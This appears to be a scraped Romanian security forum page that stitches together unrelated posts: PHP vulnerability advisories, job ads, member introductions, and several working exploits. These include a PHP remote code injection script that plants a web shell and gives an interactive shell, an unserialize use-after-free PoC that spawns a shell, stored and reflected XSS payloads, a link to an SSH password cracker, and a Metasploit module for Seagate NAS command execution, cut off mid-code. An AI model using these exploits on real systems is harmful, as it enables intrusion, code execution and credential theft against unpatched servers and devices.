Search the Community

Use-After-Free in PHP May 20, 2015 Advisory ID: HTB23262 Product: PHP Vendor: PHP Group Vulnerable Versions: 5.6.9 and probably prior Tested Version: 5.6.9 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Fix: June 2, 2015 Public Disclosure: June 10, 2015 Latest Update: June 9, 2015 Vulnerability Type: Use After Free [CWE-416] CVE Reference: Pending Risk Level: Medium CVSSv2 Base Score: 4.6 Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab Advisory Details: High-Tech Bridge Security Research Lab discovered use-after-free vulnerability in a popular programming language PHP, which can be exploited to cause crash and possibly execute arbitrary code on the target system. The vulnerability resides within the 'spl_heap_object_free_storage()' PHP function when trying to dereference already freed memory. A local attacker can cause segmentation fault or possibly execute arbitrary code on the target system with privileges of webserver. Below is a simple code that will trigger a crash: <?php class SplMinHeap1 extends SplMinHeap { public function compare($a, $ { return -parent::notexist($a, $; } } $h = new SplMinHeap1(); $h->insert(1); $h->insert(6); $h->insert(5); $h->insert(2); ?> Running the following PoC we get: gdb-peda$ r ~/Desktop/heap_uaf.php Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php PHP Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Program received signal SIGSEGV, Segmentation fault. [----------------------------------------------------------------------- ---registers-------------------------------------------------------------------- -------] RAX: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBX: 0x8000000 RCX: 0xcd0458 ("/home/test/De"...) RDX: 0x16f RSI: 0xcd0458 ("/home/test/De"...) RDI: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RSP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RIP: 0x82a96f (<zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10]) R8 : 0x269 R9 : 0x0 R10: 0x7fffffff9b20 --> 0x0 R11: 0x7ffff71102f0 --> 0xfffda6c0fffda3ef R12: 0x4209e0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf30 --> 0x2 R14: 0x0 R15: 0x0 [-------------------------------------------------------------------------- ---code------------------------------------------------------------------------- ----] 0x82a964 <zval_delref_p+1>: mov rbp,rsp 0x82a967 <zval_delref_p+4>: mov QWORD PTR [rbp-0x8],rdi 0x82a96b <zval_delref_p+8>: mov rax,QWORD PTR [rbp-0x8] => 0x82a96f <zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10] 0x82a972 <zval_delref_p+15>: lea edx,[rax-0x1] 0x82a975 <zval_delref_p+18>: mov rax,QWORD PTR [rbp-0x8] 0x82a979 <zval_delref_p+22>: mov DWORD PTR [rax+0x10],edx 0x82a97c <zval_delref_p+25>: mov rax,QWORD PTR [rbp-0x8] [-------------------------------------------------------------------- --------stack------------------------------------------------------------------- ----------] As seen above when trying to dereference the value from $rax (which has been already freed) PHP crashes. Stopped reason: SIGSEGV 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 411 return --pz->refcount__gc; Running the backtrace command we can see a couple of freed variables: zval_ptr, pz gdb-peda$ bt #0 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 #1 0x000000000082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76 #2 0x000000000082bdcb in _zval_ptr_dtor (zval_ptr=0x7ffff7fcba88, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424 #3 0x00000000006e5c1a in spl_heap_object_free_storage (object=0x7ffff7dfdfa0) at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367 #4 0x000000000087f566 in zend_objects_store_free_object_storage (objects=0x102e640 <executor_globals+928>) at /home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97 #5 0x000000000082b89e in shutdown_executor () at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290 #6 0x0000000000841a4c in zend_deactivate () at /home/test/Desktop/php-5.6.9/Zend/zend.c:960 #7 0x00000000007a7c40 in php_request_shutdown (dummy=0x0) at /home/test/Desktop/php-5.6.9/main/main.c:1882 #8 0x00000000008f6501 in do_cli (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1177 #9 0x00000000008f6d8b in main (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1378 #10 0x00007ffff6faaec5 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #11 0x0000000000420a09 in _start () Lastly, from stack #2 we clearly see that the zval_ptr pointer (0x7ffff7fcba88) points to freed memory: gdb-peda$ x/50xw 0x7ffff7fcba88 0x7ffff7fcba88: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7 ffff7fcba98: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaa8: 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbab8: 0x5a5a5a5a 0x5a5a5a5a 0x5 a5a5a5a 0x5a5a5a5a 0x7ffff7fcbac8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbad8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbae8: 0x 5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaf8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb08: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5 a5a 0x7ffff7fcbb18: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb28 : 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb38: 0x5a5a5a5a 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb48: 0x5a5a5a5a 0x5a5a5a5a This vulnerability was successfully reproduced Ubuntu 14.04.1 LTS (32 bit and 64 bit) on the latest version of PHP 5.6.9. ImmuniWeb® On-Demand Web Application Penetration Test Solution: Apply Vendor's patch. More Information: https://bugs.php.net/bug.php?id=69737 72.52.91.13 Git - php-src.git/commit References: [1] High-Tech Bridge Advisory HTB23262 - https://www.htbridge.com/advisory/HTB23262 - Use-After-Free in PHP. [2] PHP - PHP: Hypertext Preprocessor - PHP is a popular general-purpose scripting language that is especially suited to web development. [3] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - a PCI compliant web application penetration test combined with managed vulnerability scan. Configure, schedule, and manage online 24/7. Source : https://www.htbridge.com/advisory/HTB23262

The PHP development team announces the immediate availability of PHP 7.0.0 Alpha 1. This release marks the beginning of the PHP 7 major series. All users of PHP are encouraged to test this version carefully, and report any bugs and incompatibilities in the bug tracking system. THIS IS A DEVELOPMENT PREVIEW - DO NOT USE IT IN PRODUCTION! PHP 7.0.0 Alpha 1 comes with new version of the Zend Engine with features such as (incomplete list): Improved performance: PHP 7 is up to twice as fast as PHP 5.6 Consistent 64-bit support Many fatal errors are now Exceptions Removal of old and unsupported SAPIs and extensions The null coalescing operator (??) Combined comparison Operator (<=>) Scalar Type Declarations Anonymous Classes For more information on the new features and other changes, you can read the NEWS file or the or the UPGRADING file for a complete list of upgrading notes. These files can also be found in the release archive. For source downloads of PHP 7.0.0 Alpha 1 please visit the download page, Windows binaries can be found on windows.php.net/qa/. The second alpha will be released on 25th of June. You can also read the full list of planned releases on our wiki. Thank you for helping us making PHP better. Source

Vreau sa rulez un player flash din php. Link-ul pe care il apelez in browser merge, dar daca il import in php nu imi mai ia parametri pe care ii dau fisierului flash. Link-ul care player: https://www.clipurivideo.net/vechi/player.swf?file=https://www.clipurivideo.net/media/b5ffd74fe774483c1cb15272c83156d6.mp4 Continutul fisierului php: header("Content-Type: application/x-shockwave-flash"); $file_real = 'https://www.clipurivideo.net/vechi/player.swf?file=https://www.clipurivideo.net/media/b5ffd74fe774483c1cb15272c83156d6.mp4'; $stream = fopen($file_real, 'rb'); fpassthru($stream);

Am diferite proiecte in curs de executie si am nevoie de un baiat bun pe html, php pentru a-mi face diferite pagini, scripturi. PM pentru detalii !

Hi Team, #Affected Vendor: https://www.php-fusion.co.uk/home.php #Date: 04/05/2015 #Creditee: http://osvdb.org/creditees/13518-vadodil-joel-varghese #Type of vulnerability: Persistent XSS + Clickjacking #Tested on: Windows 8.1 #Product: PHP Fusion #Version: 7.02.07 #1 Cross Site Scripting x-x-x-x-x-x-x-x-x-x-x-x- #Tested Link: http://localhost/PHPfusion/files/administration/custom_pages.php?aid=68bca08161175b0e #Description: PHP Fusion is vulnerable to stored cross site scriting vulnerability as the parameter "page_content" is vulnerable which will lead to its compromise. #Proof of Concept (PoC): page_title=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%27%29%22%2F%3E&page_access=0&page_content=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%21%21%27%29%22%2F%3E&add_link=1&page_comments=1&page_ratings=1&save=Save+Page #2 UI redress attack x-x-x-x-x-x-x-x-x-x-x #Tested Link: http://localhost/PHPfusion/files/viewpage.php?page_id=5 #Description: PHP Fusion is vulnerable to UI redress attack as multiple transparent or opaque layers can be used to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. #Proof of Concept (PoC): <iframe src=" http://localhost/PHPfusion/files/viewpage.php?page_id=5" sanboxed width=900 height=900> Please check me out !!!! </iframe> -- Regards, *Joel V* Source

I'm a one of administrator at Security0ne! My nick name is SilaxHe, i'm from Rusia. My Skillz: HTML / JS / PHP /Python / Bash. I'm Glad to be here.

# Type Confusion Infoleak Vulnerability in unserialize() with SoapFault Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1 - Release Date: 2015.4.28 > A type confusion vulnerability was discovered in unserialize() with SoapFault object's __toString() magic method that can be abused for leaking arbitrary memory blocks. Affected Versions ------------ Affected is PHP 5.6 < 5.6.8 Affected is PHP 5.5 < 5.5.24 Affected is PHP 5.4 < 5.4.40 Affected is PHP 5.3 <= 5.3.29 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` PHP_METHOD(SoapFault, __toString) { ... faultcode = zend_read_property(soap_fault_class_entry, this_ptr, "faultcode", sizeof("faultcode")-1, 1 TSRMLS_CC); faultstring = zend_read_property(soap_fault_class_entry, this_ptr, "faultstring", sizeof("faultstring")-1, 1 TSRMLS_CC); file = zend_read_property(soap_fault_class_entry, this_ptr, "file", sizeof("file")-1, 1 TSRMLS_CC); line = zend_read_property(soap_fault_class_entry, this_ptr, "line", sizeof("line")-1, 1 TSRMLS_CC); ... len = spprintf(&str, 0, "SoapFault exception: [%s] %s in %s:%ld\nStack trace:\n%s", Z_STRVAL_P(faultcode), Z_STRVAL_P(faultstring), Z_STRVAL_P(file), Z_LVAL_P(line), Z_STRLEN_P(trace) ? Z_STRVAL_P(trace) : "#0 {main}\n"); zval_ptr_dtor(&trace); RETURN_STRINGL(str, len, 0); } ``` The Z_STRVAL_P macro lead to looking up an arbitrary valid memory address, and return a string via a integer-type zval that start from this memory address. If the memory address is an invalid memory position, it should result in a crash. The Z_LVAL_P macro lead to leaking memory address via a string-type zval that this string value stored. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. ``` <?php $data = 'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"'."\0*\0".'file";i:4298447319;s:7:"'."\0*\0".'line";s:4:"ryat";}'; echo unserialize($data); ?> ``` Test the PoC on the command line, then output some memory blocks and memory address: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run test.php SoapFault exception: [UH??AWAVSPI??I??H???? in UH??AWAVAUATSH???:4307253992 ] UH??SPD???*?????t"H? Stack trace: #0 test.php(4): unserialize('O:9:"SoapFault"...') #1 {main} Process 889 exited with status = 0 (0x00000000) Source

In Bucuresti, cei interesati pot aplica pentru un post de PHP Developer. Candidatul ideal trebuie sa aiba cel putin un an de experienta in domeniu, experienta extensiva in designul si dezvoltarea aplicatiilor web cu PHP, Zend Framework, HTML, CSS, Java Script si AJAX. De asemenea, sunt necesare cunostinte de operare ale unor baze de date precum MySQL si MSSQL. Avantaj la angajare au candidatii care mai au si cunostinte de Memcache, Gearman, RabbitMQ, Symfony 2, Web Services si Apache. Viitorul angajat se va ocupa de designul si de implementarea mai multor aplicatii pe diverse platforme, potrivit anuntului de angajare postat pe un site de recrutare. Tot un post de PHP Developer este disponibil si in Iasi. Tot aici, se cauta o casiera pentru showroom, care sa aiba cel putin 6 luni de experienta pe un post similar si studii medii. Persoanele care vor sa aplice pentru acest post trebuie s? aibe cunostinte minime ale pachetului Microsoft Office, de contabilitate primara si de facturare. Iar in Craiova, eMag angajeaza Senior PHP Developer. eMag face angajari in Bucuresti, Iasi si Craiova. Ce salarii ofera cel mai mare retailer online din Romania Cariere - eMAG.ro

<?php /* OutPut: #[+] Author: TUNISIAN CYBER #[+] Script coded BY: Egidio Romano aka EgiX #[+] Title: Open-Letters Remote PHP Code Injection Vulnerability #[+] Date: 19-04-2015 #[+] Vendor: http://www.open-letters.de/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] CVE: #[+] Twitter: @TCYB3R #[+] Egix's Contact: n0b0d13s[at]gmail[dot]com #[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png OL-shell> */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "#[+] Author: TUNISIAN CYBER\n"; print "#[+] Script coded BY: Egidio Romano aka EgiX\n"; print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n"; print "#[+] Date: 19-04-2015\n"; print "#[+] Vendor: http://www.open-letters.de/\n"; print "#[+] Type: WebAPP\n"; print "#[+] Tested on: KaliLinux (Debian)\n"; print "#[+] CVE:\n"; print "#[+] Twitter: @TCYB3R\n"; print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n"; print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /zenphoto/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($exploit)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$exploit}"; http_send($host, $packet); $packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nOL-shell> "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?> Source: http://packetstorm.wowhacker.com/1504-exploits/openletters-inject.txt

Salut am 17 ani. Imi place programarea si web design-ul. Cunostinte: Delphi, Php, MySql, Linux

EN: This is a php script that uses a pre-defined set of possible passwords and tries them against a given ssh server. RO: Acesta este un script php care foloseste un set predefinit de posibile parole ?i le încearc? impotriva unui server ssh dat P.S dac? e am s? il testez ?i am s? revin cu mai multe informa?ii despre el. Download: Download: T35T-SSH Password Cracker / Scanner ? Packet Storm

Link: Free PHP Web Hosting. No Forced Ads. Unlimited Resources. #1 in USA, UK & Canada -> F?r? reclame... -> Full Wordpress , PHP & MySql Support.

#Use After Free Vulnerability in unserialize() Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.2.3 - Release Date: 2015.3.20 > A use-after-free vulnerability was discovered in unserialize() with a specially defined object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code. Affected Versions ------------ Affected is PHP 5.6 < 5.6.7 Affected is PHP 5.5 < 5.5.23 Affected is PHP 5.4 < 5.4.39 Affected is PHP 5 <= 5.3.29 Affected is PHP 4 <= 4.4.9 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` static inline int object_common2(UNSERIALIZE_PARAMETER, zend_long elements) { zval retval; zval fname; if (Z_TYPE_P(rval) != IS_OBJECT) { return 0; } //??? TODO: resize before if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_P(rval), elements, 1)) { return 0; } ZVAL_DEREF(rval); if (Z_OBJCE_P(rval) != PHP_IC_ENTRY && zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup", sizeof("__wakeup")-1)) { ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1); BG(serialize_lock)++; call_user_function_ex(CG(function_table), rval, &fname, &retval, 0, 0, 1, NULL); ``` A specially defined __wakeup() magic method lead to various problems. The simple code: ``` <?php class evilClass { public $var; function __wakeup() { unset($this->var); // $this->var = 'ryat'; } } $data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;R:4;}'); ?> ``` Object properties assignment or destroy operation leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. ``` <?php $f = $argv[1]; $c = $argv[2]; $fakezval1 = ptr2str(0x100b83008); $fakezval1 .= ptr2str(0x8); $fakezval1 .= "\x00\x00\x00\x00"; $fakezval1 .= "\x06"; $fakezval1 .= "\x00"; $fakezval1 .= "\x00\x00"; $data1 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}'; $x = unserialize($data1); $y = $x[2]; // zend_eval_string()'s address $y[0][0] = "\x6d"; $y[0][1] = "\x1e"; $y[0][2] = "\x35"; $y[0][3] = "\x00"; $y[0][4] = "\x01"; $y[0][5] = "\x00"; $y[0][6] = "\x00"; $y[0][7] = "\x00"; $fakezval2 = ptr2str(0x3b296324286624); // $f($c); $fakezval2 .= ptr2str(0x100b83000); $fakezval2 .= "\xff\xff\xff\xff"; $fakezval2 .= "\x05"; $fakezval2 .= "\x00"; $fakezval2 .= "\x00\x00"; $data2 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;a:1:{i:0;R:4;}}}'; $z = unserialize($data2); intval($z[2]); function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } class evilClass { public $var; function __wakeup() { unset($this->var); // $this->var = 'ryat'; } } ?> ``` Test the PoC on the command line, then any PHP code can be executed: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)" Process 13472 launched: '/usr/bin/php' (x86_64) sh: no job control in this shell sh-3.2$ php -v PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies sh-3.2$ exit exit Process 13472 exited with status = 0 (0x00000000) (lldb) ``` Source

dami PM doar daca te descurci si in programare si php c++ etc etc....

Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability. # Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability # CVE : CVE-2015-2217 # Date : 4 March 2015 # Exploit Author : CWH Underground # Discovered By : ZeQ3uL # Site : www.2600.in.th # Vendor Homepage : http://www.myupb.com # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip # Version : 2.2.7 ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' #################### SOFTWARE DESCRIPTION #################### Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL. #################################### DESCRIPTION FOR CROSS SITE SCRIPTING #################################### myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. myUPB 2.2.7 is vulnerable; other versions may also be affected. #################### VULNERABILITY DETAIL #################### 1. Reflect Cross Site Scripting (search.php) POC: /search.php?q='><script>alert(1)</script> 2. Stored Cross Site Scripting (profile.php) POC: POST /upb/profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/upb/profile.php Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------287611866431947 Content-Length: 716 -----------------------------287611866431947 Content-Disposition: form-data; name="u_email" t@t.com -----------------------------287611866431947 Content-Disposition: form-data; name="u_loca" th -----------------------------287611866431947 Content-Disposition: form-data; name="avatar" images/avatars/chic.jpg'><script>alert("hacked");</script> -----------------------------287611866431947 Content-Disposition: form-data; name="u_site" http:// -----------------------------287611866431947 Content-Disposition: form-data; name="u_timezone" 0 -----------------------------287611866431947 Content-Disposition: form-data; name="u_edit" Submit -----------------------------287611866431947-- ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution', 'Description' => %q{ Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open to attack from users without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. This module has been tested on the STBN300 device. }, 'Author' => [ 'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module ], 'References' => [ ['CVE', '2014-8684'], ['CVE', '2014-8686'], ['CVE', '2014-8687'], ['EDB', '36202'], ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'], ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/'] ], 'DisclosureDate' => 'Mar 01 2015', 'Privileged' => true, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Payload' => {'DisableNops' => true}, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'License' => MSF_LICENSE )) register_options([ OptString.new('TARGETURI', [true, 'Path to the application root', '/']), OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']), OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']), OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07']) ]) end # # Write a string value to a serialized PHP object without deserializing it first. # If the value exists it will be updated. # def set_string(php_object, name, value) prefix = "s:#{name.length}:\"#{name}\";s:" if php_object.include?(prefix) # the value already exists in the php blob, so update it. return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"") end # the value doesn't exist in the php blob, so create it. count = php_object.split(':')[1].to_i + 1 php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}") end # # Findez ze holez! # def check begin res = send_request_cgi( 'uri' => normalize_uri(target_uri), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' } ) if res && res.code == 200 headers = res.to_s # validate headers if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') # and make sure that the body contains the title we'd expect if res.body.include?('Login to BlackArmor') return Exploit::CheckCode::Appears end end end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable # something went wrong, assume safe. end Exploit::CheckCode::Safe end # # Executez ze sploitz! # def exploit # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin print_status("#{peer} - Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' } }) if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/ cookie_value = $1.strip else fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") end # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting print_status("#{peer} - Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) vprint_status("#{peer} - PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) # Step 3 - Extract the current host configuration so that we don't lose it. host_config = nil # This time value needs to be consistent across calls config_time = ::Time.now.to_i begin print_status("#{peer} - Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time } ) if res && res.code == 200 res.body.split("\r\n").each do |l| if l.include?('general_setup') host_config = l break end end else fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") end print_good("#{peer} - Host configuration extracted.") vprint_status("#{peer} - Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations # and we can't put anything in with '$' in it. So we need to make a simple install # payload which will write a required payload to disk that can be executes directly # as the last part of the payload. This will also be self-deleting. param_id = rand_text_alphanumeric(3) # There are no files on the target file system that start with an underscore # so to allow for a small file size that doesn't collide with an existing file # we'll just prefix it with an underscore. payload_file = "_#{rand_text_alphanumeric(3)}.php" installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") vprint_status("#{peer} - Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML # spits out. desc_start = host_config.index('" description="') + 15 desc_end = host_config.index('"', desc_start) xml_payload = host_config[0, desc_start] + stager + host_config[desc_end, host_config.length] vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk print_status("#{peer} - Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time }, 'vars_post' => { 